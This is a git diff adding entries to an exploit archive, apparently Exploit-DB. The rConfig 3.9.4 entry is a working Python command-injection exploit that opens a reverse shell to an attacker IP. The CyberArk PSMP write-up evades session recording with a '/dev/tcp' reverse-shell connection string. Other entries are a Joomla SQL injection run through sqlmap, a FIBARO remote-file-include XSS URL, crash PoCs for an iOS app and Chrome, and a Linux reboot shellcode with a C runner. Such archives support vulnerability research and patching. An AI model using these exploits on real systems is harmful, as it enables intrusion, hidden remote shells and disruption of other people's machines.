diff --git a/exploits/ios/dos/48236.py b/exploits/ios/dos/48236.py new file mode 100755 index 000000000..f73e3d2dd --- /dev/null +++ b/exploits/ios/dos/48236.py @@ -0,0 +1,24 @@ +# Exploit Title: ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC) +# Author: Ivan Marmolejo +# Date: 2020-03-22 +# Vendor Homepage: https://apps.apple.com/us/app/proficyscada/id525792142 +# Software Link: App Store for iOS devices +# Tested Version: 5.0.25920 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: iPhone 6s iOS 13.3 + +Steps to Produce the Crash: +1.- Run python code: ProficySCADA.py +2.- Copy content to clipboard +3.- Open "ProficySCADA for iOS" +4.- Add +5.- Username --> admin +6.- Paste ClipBoard on "Password" +7.- Add +8.- Connect +9.- Crashed + +#!/usr/bin/env python + +buffer = "\x41" * 257 +print (buffer) \ No newline at end of file diff --git a/exploits/multiple/remote/48239.txt b/exploits/multiple/remote/48239.txt new file mode 100644 index 000000000..29c56f87a --- /dev/null +++ b/exploits/multiple/remote/48239.txt @@ -0,0 +1,93 @@ +# Exploit Title: CyberArk PSMP 10.9.1 - Policy Restriction Bypass +# Google Dork: NA +# Date: 2020-02-25 +# Exploit Author: LAHBAL Said +# Vendor Homepage: https://www.cyberark.com/ +# Software Link: https://www.cyberark.com/ +# Version: PSMP <=10.9.1 +# Tested on: PSMP 10.9 & PSMP 10.9.1 +# CVE : N/A +# Patched : PSMP >= 11.1 + +[Prerequisites] + +Policy allows us to overwrite PSMRemoteMachine + +[Description] +An issue was discovered in CyberArk Privileged Session Manager SSH Proxy +(PSMP) +through 10.9.1. +All recordings mechanisms (Keystoke, SSH Text Recorder and video) can be +evaded +because users entries are not properly validated. +Commands executed in a reverse shell are not monitored. +The connection process will freeze just after the "session is being +recorded" banner and the all commands we enter are not monitored. + +------------------------------------------ + +[Additional Information] +We can got a reverse shell (or execute any command we want) from remote +target and be completely invisible from CyberArk. In logs, we have only +both PSMConnect and PSMDisconnect events. +Here are details of the attack : +1. I connect through CyberArk PSMP server using this +connection string : ssh %username+address%'remoteMachine +bash -i >& /dev/tcp//&1'@ +Example : ssh slahbal%sharedLinuxAccount+test.intra%'linux01 bash -i >& +/dev/tcp/192.168.0.10/443 0>&1'@psmp +3. This connection string will : +- Connect me to linux01 using sharedLinuxAccount account that is stored +into CyberArk and to which I have access. +- Create a reverse shell to my workstation 192.168.0.10:443 (nc.exe is +listening on port 443 for this test). +4. The connection process will freeze just after "The sessions is being +recorded" banner +5. I got a reverse shell on which all commands ar not monitored. +Note 1 : The command that created the reverse shell is NOT captured by +CyberArk. +Note 2 : sshd_config has been set with those parameters : +PSMP_AdditionalDelimiter % +PSMP_TargetAddressPortAdditionalDelimiter + + +------------------------------------------ + +[VulnerabilityType Other] +Bypass all recordings mechanisms (Keystoke, SSH Text Recorder and video) + +------------------------------------------ + +[Vendor of Product] +CyberArk + +------------------------------------------ + +[Affected Product Code Base] +PSMP - <=10.9.1 + +------------------------------------------ + +[Affected Component] +/opt/CARKpsmp/bin/psmpserver + +------------------------------------------ + +[Attack Type] +Local + +------------------------------------------ + +[CVE Impact Other] +The vulnerability allow you to connect through CyberArk PSMP server +bypassing all recordings mechanisms + +------------------------------------------ + +[Attack Vectors] +To exploit the vulnerability, someone must connect through PSMP using a +crafted connection string. + +------------------------------------------ + +[Has vendor confirmed or acknowledged the vulnerability?] +true \ No newline at end of file diff --git a/exploits/multiple/webapps/48240.txt b/exploits/multiple/webapps/48240.txt new file mode 100644 index 000000000..80ad639d9 --- /dev/null +++ b/exploits/multiple/webapps/48240.txt @@ -0,0 +1,56 @@ +# Exploit Title: FIBARO System Home Center 5.021 - Remote File Include +# Date: 2020-03-22 +# Author: LiquidWorm +# Vendor: https://www.fibaro.com +# CVE: N/A + +Vendor: FIBAR GROUP S.A. +Product web page: https://www.fibaro.com +Affected version: Home Center 3, Home Center 2, Home Center Lite + 5.021.38 + 4.580 + 4.570 + 4.540 + 4.530 + 4.510 + 4.180 + + +Summary: Imagine that you live in a house where everything happens by itself. +FIBARO Smart Home takes care of your everyday comfort and safety of all family +members and in the meantime, saves energy on every single occasion. All this is +possible thanks to Home Center 2 smart home HUB. Home Center 2 is an indispensable +part of the FIBARO System without which the rest devices of home automation would +be only beautiful objects. The smart home HUB collects and analyzes information +about devices, communicates them with each other and thus directs the operation +of the entire system and takes care of its security. + +Desc: The smart home solution is vulnerable to a remote Cross-Site Scripting +triggered via a Remote File Inclusion issue by including arbitrary client-side +dynamic scripts (JavaScript, VBScript) due to the undocumented proxy API and its +url GET parameter. This allows hijacking the current session of the user or +changing the look of the page by changing the HTML. + +Tested on: Apache/2.2.16 (Debian) + nginx/1.9.5 + nginx/1.8.0 + lighttpd/1.4.41 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5563 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5563.php + + +04.02.2020 + +-- + + +http://10.0.0.2:8880/api/proxy?url=https://www.zeroscience.mk/pentest/XSS.svg + +$ cat /pentest/XSS.svg + \ No newline at end of file diff --git a/exploits/php/webapps/40968.php b/exploits/php/webapps/40968.sh old mode 100644 new mode 100755 similarity index 100% rename from exploits/php/webapps/40968.php rename to exploits/php/webapps/40968.sh diff --git a/exploits/php/webapps/48241.py b/exploits/php/webapps/48241.py new file mode 100755 index 000000000..2d0a3ce6b --- /dev/null +++ b/exploits/php/webapps/48241.py @@ -0,0 +1,54 @@ +# Exploit Title: rConfig 3.9.4 - 'search.crud.php' Remote Command Injection +# Date: 2020-03-21 +# Exploit Author: Matthew Aberegg, Michael Burkey +# Vendor Homepage: https://www.rconfig.com +# Software Link: https://www.rconfig.com/downloads/rconfig-3.9.4.zip +# Version: rConfig 3.9.4 +# Tested on: Cent OS 7 (1908) + +#!/usr/bin/python3 + +import requests +import sys +import urllib.parse +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +if len(sys.argv) != 6: + print("[~] Usage : https://rconfig_host, Username, Password, Attacker IP, Attacker Port") + exit() + +host = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] +attacker_ip = sys.argv[4] +attacker_port = sys.argv[5] + +login_url = host + "/lib/crud/userprocess.php" +payload = "|| bash -i >& /dev/tcp/{0}/{1} 0>&1 ;".format(attacker_ip, attacker_port) +encoded_payload = urllib.parse.quote_plus(payload) + + +def exploit(): + s = requests.Session() + + res = s.post( + login_url, + data={ + 'user': username, + 'pass': password, + 'sublogin': 1 + }, + verify=False, + allow_redirects=True + ) + + injection_url = "{0}/lib/crud/search.crud.php?searchTerm=test&catId=2&numLineStr=&nodeId={1}&catCommand=showcdpneigh*.txt&noLines=".format(host, encoded_payload) + res = s.get(injection_url, verify=False) + + if res.status_code != 200: + print("[~] Failed to connect") + + +if __name__ == '__main__': + exploit() \ No newline at end of file diff --git a/exploits/php/webapps/48242.txt b/exploits/php/webapps/48242.txt new file mode 100644 index 000000000..589b35000 --- /dev/null +++ b/exploits/php/webapps/48242.txt @@ -0,0 +1,36 @@ +# Exploit Title: Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection +# Dork: inurl:"index.php?option=com_hdwplayer" +# Date: 2020-03-23 +# Exploit Author: qw3rTyTy +# Vendor Homepage: https://www.hdwplayer.com/ +# Software Link: https://www.hdwplayer.com/download/ +# Version: 4.2 +# Tested on: Debian/Nginx/Joomla! 3.9.11 + +########################################################################## +#Vulnerability details +########################################################################## +File: components/com_hdwplayer/models/search.php +Func: HdwplayerModelSearch::getsearch +Line: 33 + + 16 class HdwplayerModelSearch extends HdwplayerModel { + ...snip... + 30 function getsearch() { + 31 $db = JFactory::getDBO(); + 32 $search = JRequest::getVar('hdwplayersearch', '', 'post', 'string'); + 33 $query = "SELECT * FROM #__hdwplayer_videos WHERE published=1 AND (title LIKE '%$search%' OR category LIKE '%$search%' OR tags LIKE '%$search%')"; //!!! + 34 + 35 $db->setQuery($query); + 36 $output = $db->loadObjectList(); + 37 return($output); + 38 } + 39 + 40 } + 41 + 42 ?> + +########################################################################## +#PoC +########################################################################## +$> python ./sqlmap.py -u "http://127.0.0.1/joomla/index.php" --method=POST --random-agent --data "option=com_hdwplayer&view=search&hdwplayersearch=xxx" --level=5 --risk=3 --dbms=mysql -p hdwplayersearch \ No newline at end of file diff --git a/exploits/windows/dos/48237.txt b/exploits/windows/dos/48237.txt new file mode 100644 index 000000000..3a85250a3 --- /dev/null +++ b/exploits/windows/dos/48237.txt @@ -0,0 +1,82 @@ +# Exploit Title: Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC) +# Google Dork: N/A +# Date: 2020-02-21 +# Exploit Author: Cem Onat Karagun of Diesec GmBH +# Vendor Homepage: https://www.google.com/ +# Version: Google Chrome 80.0.3987.87 +# Tested on: Windows x64 / Linux Debian x64 / MacOS +# CVE: CVE-2020-6404 +# PoC Video: http://www.youtube.com/watch?v=tv5sDDwiWg8 +# Description: https://bugs.chromium.org/p/chromium/issues/detail?id=1024256 + +Thread 35 "Chrome_InProcRe" received signal SIGSEGV, Segmentation fault. +[Switching to Thread 0x7f2cbf9ad700 (LWP 3275)] +[----------------------------------registers-----------------------------------] +RAX: 0x7f2cbe98d100 --> 0x41b58ab3 +RBX: 0x7f2cbf9aa9c0 --> 0xfe597d7178d --> 0x0 +RCX: 0x1fffffffffffffff +RDX: 0x7f2cbeb8bdf4 --> 0x0 +RSI: 0x7f2cbeb8bdc0 --> 0x613000000000 --> 0xcc6e96b9 --> 0x0 +RDI: 0x0 +RBP: 0x7f2cbf9aaa70 --> 0x7f2cbf9aabf0 --> 0x7f2cbf9aad10 --> +0x7f2cbf9aadd0 --> 0x7f2cbf9aaea0 --> 0x7f2cbf9aafb0 (--> ...) + +RSP: 0x7f2cbf9aa9c0 --> 0xfe597d7178d --> 0x0 +RIP: 0x559e50c11189 (: mov cl,BYTE PTR +[rcx+0x7fff8000]) +R8 : 0xfffffffffffffff8 +R9 : 0x0 +R10: 0x7f2cbec6a670 --> 0x7f2cbec6a070 --> 0xd47000000000000 ('') +R11: 0x7f2cbe98d100 --> 0x41b58ab3 +R12: 0xfe597d31a20 --> 0x0 +R13: 0x7f2cbeb8bde8 --> 0x0 +R14: 0x0 +R15: 0x2 +EFLAGS: 0x10a06 (carry PARITY adjust zero sign trap INTERRUPT direction +OVERFLOW) +[-------------------------------------code-------------------------------------] +0x559e50c1117e : lea r8,[rdi-0x8] +0x559e50c11182 : mov rcx,r8 +0x559e50c11185 : shr rcx,0x3 +=> 0x559e50c11189 : mov cl,BYTE PTR +[rcx+0x7fff8000] +0x559e50c1118f : test cl,cl +0x559e50c11191 : +jne 0x559e50c11418 +0x559e50c11197 : add +rdi,0xffffffffffffffff +0x559e50c1119b : mov rcx,rdi +[------------------------------------stack-------------------------------------] +0000| 0x7f2cbf9aa9c0 --> 0xfe597d7178d --> 0x0 +0008| 0x7f2cbf9aa9c8 --> 0xc0c001162e6 --> 0x0 +0016| 0x7f2cbf9aa9d0 --> 0xfe597d717be --> 0x0 +0024| 0x7f2cbf9aa9d8 --> 0xfe597d717bd --> 0x0 +0032| 0x7f2cbf9aa9e0 --> 0x7f2cbeb8bdf4 --> 0x0 +0040| 0x7f2cbf9aa9e8 --> 0x7f2cbeb8bea0 --> 0x6060008b1720 --> +0x602000098630 --> 0x200000003 --> 0x0 + +0048| 0x7f2cbf9aa9f0 --> 0x21bec4d308 --> 0x0 +0056| 0x7f2cbf9aa9f8 --> 0xfe597cfab48 --> 0x0 +[------------------------------------------------------------------------------] +Legend: code, data, rodata, value +Stopped reason: SIGSEGV +0x0000559e50c11189 in MappingForIndex () +at +../../third_party/blink/renderer/core/editing/finder/find_buffer.cc:450 +450 +../../third_party/blink/renderer/core/editing/finder/find_buffer.cc: No +such file or directory. + + + + + + + + + + \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 19b8c416e..70f897f93 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6686,6 +6686,8 @@ id,file,description,date,author,type,platform,port 48136,exploits/windows/dos/48136.py,"Odin Secure FTP Expert 7.6.3 - Denial of Service (PoC)",2020-02-25,"berat isler",dos,windows, 48137,exploits/windows/dos/48137.py,"Core FTP LE 2.2 - Denial of Service (PoC)",2020-02-26,"Ismael Nava",dos,windows, 48216,exploits/windows/dos/48216.md,"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)",2020-03-14,eerykitty,dos,windows, +48236,exploits/ios/dos/48236.py,"ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)",2020-03-23,"Ivan Marmolejo",dos,ios, +48237,exploits/windows/dos/48237.txt,"Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)",2020-03-23,"Cem Onat Karagun",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -18052,6 +18054,7 @@ id,file,description,date,author,type,platform,port 48224,exploits/multiple/remote/48224.rb,"ManageEngine Desktop Central - Java Deserialization (Metasploit)",2020-03-17,Metasploit,remote,multiple, 48228,exploits/hardware/remote/48228.txt,"Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)",2020-03-18,FarazPajohan,remote,hardware, 48233,exploits/multiple/remote/48233.py,"Broadcom Wi-Fi Devices - 'KR00K Information Disclosure",2020-03-18,"Maurizio S",remote,multiple, +48239,exploits/multiple/remote/48239.txt,"CyberArk PSMP 10.9.1 - Policy Restriction Bypass",2020-03-23,"LAHBAL Said",remote,multiple, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -39294,7 +39297,7 @@ id,file,description,date,author,type,platform,port 43882,exploits/asp/webapps/43882.rb,"Kaseya Virtual System Administrator (VSA) 7.0 < 9.1 - (Authenticated) Arbitrary File Upload",2015-09-28,"Pedro Ribeiro",webapps,asp, 40961,exploits/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",webapps,multiple, 40966,exploits/php/webapps/40966.txt,"Joomla! Component Blog Calendar - SQL Injection",2016-12-26,X-Cisadane,webapps,php, -40968,exploits/php/webapps/40968.php,"PHPMailer < 5.2.18 - Remote Code Execution (Bash)",2016-12-26,"Dawid Golunski",webapps,php, +40968,exploits/php/webapps/40968.sh,"PHPMailer < 5.2.18 - Remote Code Execution (Bash)",2016-12-26,"Dawid Golunski",webapps,php, 40970,exploits/php/webapps/40970.php,"PHPMailer < 5.2.18 - Remote Code Execution (PHP)",2016-12-25,"Dawid Golunski",webapps,php, 40969,exploits/php/webapps/40969.pl,"PHPMailer < 5.2.20 - Remote Code Execution",2016-12-27,"Dawid Golunski",webapps,php, 40971,exploits/php/webapps/40971.txt,"WordPress Plugin Simply Poll 1.4.1 - SQL Injection",2016-12-28,"TAD GROUP",webapps,php, @@ -42486,3 +42489,6 @@ id,file,description,date,author,type,platform,port 48221,exploits/php/webapps/48221.py,"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php, 48225,exploits/hardware/webapps/48225.txt,"Netlink GPON Router 1.0.11 - Remote Code Execution",2020-03-18,shellord,webapps,hardware, 48234,exploits/php/webapps/48234.txt,"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)",2020-03-20,"Metin Yunus Kandemir",webapps,php, +48240,exploits/multiple/webapps/48240.txt,"FIBARO System Home Center 5.021 - Remote File Include",2020-03-23,LiquidWorm,webapps,multiple, +48241,exploits/php/webapps/48241.py,"rConfig 3.9.4 - 'search.crud.php' Remote Command Injection",2020-03-23,"Matthew Aberegg",webapps,php, +48242,exploits/php/webapps/48242.txt,"Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection",2020-03-23,qw3rTyTy,webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index d1b7ca9e2..a0c0b9007 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1015,5 +1015,6 @@ id,file,description,date,author,type,platform 47953,shellcodes/windows/47953.c,"Windows/7 - Screen Lock Shellcode (9 bytes)",2020-01-22,"Saswat Nayak",shellcode,windows 47980,shellcodes/windows/47980.txt,"Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)",2020-01-30,boku,shellcode,windows 48032,shellcodes/linux/48032.py,"Linux/x86 - Bind Shell Generator Shellcode (114 bytes)",2020-02-10,boku,shellcode,linux -48116,shellcodes/windows_x86/48116.c,"Windows\x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86 -48229,shellcodes/windows/48229.txt,"Windows\x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows +48116,shellcodes/windows_x86/48116.c,"Windows/x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86 +48229,shellcodes/windows/48229.txt,"Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows +48243,shellcodes/linux/48243.txt,"Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux diff --git a/shellcodes/linux/48243.txt b/shellcodes/linux/48243.txt new file mode 100644 index 000000000..49fe06290 --- /dev/null +++ b/shellcodes/linux/48243.txt @@ -0,0 +1,55 @@ +# Exploit Title: Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes) +# Purpose: This is a x86 Linux null-free polymorphic shellcode for forcing a reboot. +# Date: 2020-03-23 +# Author: Upayan a.k.a. slaeryan +# Contact: upayansaha@icloud.com +# SLAE: 1525 +# Vendor Homepage: None +# Software Link: None +# Tested on: Linux x86 +# CVE: N/A + + +/* +; Filename: reboot_polymorphic.nasm +; Author: Upayan a.k.a. slaeryan +; SLAE: 1525 +; Contact: upayansaha@icloud.com +; Purpose: This is a x86 Linux null-free polymorphic shellcode for forcing a reboot. +; Testing: ./reboot_polymorphic +; Compile with: ./compile.sh reboot_polymorphic +; Size of shellcode: 26 bytes + +global _start + +section .text +_start: + xor eax, eax ; Clearing the EAX register + xor ebx, ebx ; Clearing the EBX register + xor ecx, ecx ; Clearing the ECX register + cdq ; Clearing the EDX register + mov al, 0x58 ; Loading syscall value = 0x58 for reboot in AL + mov ebx, 0xfee1dead ; Loading magic 1 in EBX + mov ecx, 672274793 ; Loading magic 2 in ECX + mov edx, 0x1234567 ; Loading cmd val = LINUX_REBOOT_CMD_RESTART in EDX + int 0x80 ; Executing the reboot syscall + +*/ + + +#include +#include + +unsigned char code[] = \ +"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xcd\x80"; + +void main() +{ + + printf("Shellcode Length: %d\n", strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +} \ No newline at end of file